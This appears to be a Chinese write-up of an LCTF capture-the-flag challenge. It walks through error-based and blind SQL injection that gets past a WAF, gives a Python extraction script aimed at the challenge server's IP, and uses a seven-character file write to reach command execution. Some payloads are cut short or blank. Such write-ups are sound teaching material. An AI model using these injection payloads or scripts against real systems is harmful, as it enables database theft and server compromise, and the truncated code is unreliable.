LCTF的一道sql报错注入+七个字符命令执行

自从很多开发人员禁止回显错误以后,sql报错注入,就很少见了,所以一直没什么机会接触,感谢LCTF给我这个机会,23333

该题目的waf禁用了information_schema,table,column,以及许多报错注入的函数等

题目:http://182.254.246.93/

LCTF的一道sql报错注入+七个字符命令执行_第1张图片
image.png

提示没有源码泄露,也不需要爆破表名,列名,还给了个入口文件

和一个Tips:将表的某一个字段名,和表中某一个表值进行字符串连接,就可以得到下一个入口

LCTF的一道sql报错注入+七个字符命令执行_第2张图片
image.png

注入得到字段数量是4,而且回显位置在第二个,并且database()被禁了


image.png

image.png

对应关系是

pro_id        pro_name

1             car
2             iphone11
3             nextentrance

pro_name是我猜的,我猜测后端的逻辑大致是

select * from databasexxx.tablexxx where pro_id = $_POST['pro_id']
raw=mysql_fetch_row($result);
然后只显示raw[1],也就是只显示是第二列pro_name的内容,而且只显示一行内容
LCTF的一道sql报错注入+七个字符命令执行_第3张图片
image.png

是数字型,不用闭合,但是information_schema,table,column等很多被禁

直到后面报错得到了库名


image.png
pro_id= 1 and (extractvalue(1,concat(0x7e,(select * from abc),0x7e)))
image.png

看SSRF那道了,赛后看了pcat大佬的writeup,才知道报错注入这么叼,完全不需要information_schema,现在复现一下大佬的wp

参考链接如下:
http://mp.weixin.qq.com/s?__biz=MzIzMTc1MjExOQ==&mid=2247484338&idx=1&sn=33dc65055c9e00ce487f89c4c1ff4098&chksm=e89e2b6adfe9a27c02fc3235f319f295871fac1dd2dc3490362d644493643664cd13643ba0f9&mpshare=1&scene=1&srcid=1120z3l2FIpnrX8rZyDeQZXe#rd

报错得到当前的库名、表名、列名

pro_id=0 and linestring(pro_id)
分别是youcanneverfindme17 product_2017ctf pro_id

image.png

通过select select的报错注入,结合 join,逐步得到各列

pro_id=0 and (select * from (select * from youcanneverfindme17.product_2017ctf a join youcanneverfindme17.product_2017ctf b using (pro_id))c)
image.png

得到列 pro_name ,说明我之前猜对了,啧啧啧

go on

pro_id=0 and (select * from (select * from youcanneverfindme17.product_2017ctf a join youcanneverfindme17.product_2017ctf b using (pro_id,pro_name))c)
image.png

得到列owner

pro_id=0 and (select * from (select * from youcanneverfindme17.product_2017ctf a join youcanneverfindme17.product_2017ctf b using (pro_id,pro_name,owner))c)
image.png

得到列d067a0fa9dc61a6e

现在四个列到齐了,分别是 pro_id pro_name owner 和 d067a0fa9dc61a6e

接下来只需查询列d067a0fa9dc61a6e 的字段内容,估计会是 XXX.php,然后就能拼接得到下一个入口了

pro_id=0 union select 1 , d067a0fa9dc61a6e from product_2017ctf , 3 , 4#
无奈waf禁了这个列名

LCTF的一道sql报错注入+七个字符命令执行_第4张图片
image.png

这里Pcat用的是盲注的方法,详细原理可参考文章
http://wonderkun.cc/index.html/?p=547

这里可以搭建跟题目类似的环境

create database test_base;
use test_base;
create table test_table(pro_id int auto_increment not null primary key,pro_name char(20),owner char(20),d067a0fa9dc61a6e char(30));
show tables;
describe test_table;
insert into test_table(pro_name) values('car');
insert into test_table(pro_name) values('iphone11');
insert into test_table(pro_name) values('nextentrance');
update test_table set d067a0fa9dc61a6e='7195CA99696B5A896.php' where pro_name='nextentrance';
select * from test_table;

LCTF的一道sql报错注入+七个字符命令执行_第5张图片
image.png

然后用 order by 4 des 进行递减排序,然后在第四个字段select,mysql排序的时候会从左到右,逐位ascii码对比大小,然后排序,直接看图吧
7195CA99696B5A896.php
的hex编码是 0x37313935434139393639364235413839362e706870
LCTF的一道sql报错注入+七个字符命令执行_第6张图片
image.png

可以看到,当ascii码或者hex码,小于或者等于目标0x3731的时候,都是先搜出nextentrance,而大于的时候,比如0x3732的时候,就搜出2,所以减一就是我们的目标,0x3731了,然后逐位得出,最后hex解码得到想要的字段内容 7195CA99696B5A896.php

这里给出pcat的脚本

# -*- coding:utf8 -*-
__author__='[email protected]'

import requests
import time
import string

def foo():
    url=r'http://182.254.246.93/entrance.php'
    mys=requests.session()
    x="3 union distinct select 1,2,3,0x%s  order by 4 desc"
    cset=string.maketrans('','')[33:127]
    pwd=''
    while True:
        try:
            for i in cset:
                myd={'pro_id':x %(pwd+i).encode('hex')}
                res=mys.post(url,data=myd).content
                if 'nextentrance' not in res:
                    pwd+=chr(ord(i)-1)
                    print pwd
                    break
                pass
            time.sleep(0.01)
        except:
            print '_ _'
            time.sleep(0.5)
        pass

    pass

if __name__ == '__main__':
    foo()
    print 'ok'

然后我在想,难道就没有别的方法吗,后来我谷歌到了,不需要列名,就能得到字段内容的方法,啧啧啧,可参考文章
http://blog.7ell.me/2017/05/30/2017-DDCTF-SQL%E6%B3%A8%E5%85%A5%E4%B9%8B%E8%BF%87%E6%BB%A4%E5%88%97%E5%90%8Dget%E6%95%B0%E6%8D%AE/

这里给出我测试成功的payload
关键是利用e,这个虚表,然后用e.4指定第4列,然后记得 limit 1 offset 3 来指定第4列,不然mysql会因为返回数据的行数不同而报错

pro_id= 0 union select 1,   group_concat(distinct(select e.4 from (select * from (select 1)a,(select 2)b,(select 3)c,(select 4)d union select * from product_2017ctf )e limit 1 offset 3)),3,4#
image.png

终于得到了下一个入口

d067a0fa9dc61a6e7195ca99696b5a896.php
只能写7个字符


image.png

LCTF的一道sql报错注入+七个字符命令执行_第7张图片
image.png

尝试传入数组,如 filename[] 和 content[] 能否绕过,失败

这里还是直接看Pcat的writeup,写得很清晰,7个字符命令执行

按顺序POST提交下面3条

filename=p.php&content=

再访问p.php,就可以看到
327a6c4304ad5938eaf0efb6cc3e53dc.php

再POST
filename=bash2&content=cat /3*
再去访问p.php,右键查看源代码看到flag

详细的过程:

p.php的

访问p.php的时候,bash会被识别为命令而非文件,然后就会去执行bash2这个文件里的命令,后面的文件无视掉

通过修改bash2这个文件的内容就可以构造命令执行。

这里给个脚本

import requests
import re
url = "http://182.254.246.93/d067a0fa9dc61a6e7195ca99696b5a896.php"
user_agent = "xxx"
t = requests.post(url, headers = {'User-agent': user_agent }, data = {"filename":"aaa.php", "content":"

话说,hitcon2017的5个字符命令执行和4个字符命令执行这两道题还没复现呢,太懒了,Orz....

走过路过,欢迎纠错

你可能感兴趣的:(LCTF的一道sql报错注入+七个字符命令执行)